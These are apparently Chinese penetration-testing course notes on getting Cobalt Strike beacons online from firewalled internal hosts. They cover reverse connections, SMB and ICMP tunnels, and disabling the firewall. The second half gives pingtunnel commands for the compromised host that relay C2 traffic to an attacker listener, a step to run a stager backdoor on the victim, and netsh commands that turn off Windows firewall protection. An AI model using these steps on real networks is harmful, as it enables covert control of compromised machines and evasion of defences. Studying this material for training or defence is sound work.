1 、入站规则不出网上线方案
2 、出站规则不出网上线方案
3 、规则-隧道技术-SMB& ICMP
-隧道技术:解决不出网协议上线的问题(利用出网协议进行封装出网)
-代理技术:解决网络通讯不通的问题(利用跳板机建立节点后续操作)
-连接方向:正向& 反向(基础课程有讲过)
1 、判断什么时候用代理
2 、判断什么时候用隧道
3 、判断出网和不出网协议
4 、如何使用代理建立节点并连接
5 、如何使用隧道技术封装协议上线
6 、判断哪些代理或隧道情况选择放弃
1 、不出网-控制上线-CS-反向连接
2 、不出网-控制上线-CS-SMB隧道(使用SMB隧道普通用户是不行的,需要提权)
3 、不出网-控制上线-CS-ICMP隧道
4 、不出网-控制上线-CS-关闭防火墙
入站过滤上线:
1 、隧道技术正向硬刚
2 、反向连接跳过
3 、关闭& 删除& 替换
适用利用入站通行拿到的高权限
出站过滤上线:
1 、隧道技术反向硬刚
2 、正向连接跳过
3 、关闭& 删除& 替换
适用利用入站通行拿到的高权限
采用第三种方案:防火墙开关,删除规则,替换程序
适用于:
1 、单纯的内网环境
2 、单纯的内网域环境(域控没有设置组策略防火墙同步)
隧道技术上线:
HTTP/S & DNS & SSH & ICMP & SMB & 协议穿透等
除去SMB隧道,其他隧道技术大部分针对的出站策略绕过
ICMP
./pingtunnel -type server
肉鸡:( 管理器运行)
pingtunnel.exe -type client -l 127.0 .0.1:3333 -s 192.168 .22.130 -t 192.168 .22.130:3344 -tcp 1 -noprint 1 -nolog 1
CS:
监听器1:127.0.0.1 3333
监听器2:192.168.22.130 3344
生成监听器1的Stager后门肉鸡执行
Windows防火墙命令:
https://www.cnblogs.com/tomtellyou/p/16300557.html
查看当前防火墙状态:netsh advfirewall show allprofiles
关闭防火墙:netsh advfirewall set allprofiles state off
开启防火墙:netsh advfirewall set allprofiles state on
恢复初始防火墙设置:netsh advfirewall reset
启用桌面防火墙: netsh advfirewall set allprofiles state on
设置默认输入和输出策略:netsh advfirewall set allprofiles firewallpolicy allowinbound,allowoutbound
如果设置为拒绝使用blockinbound,blockoutbound
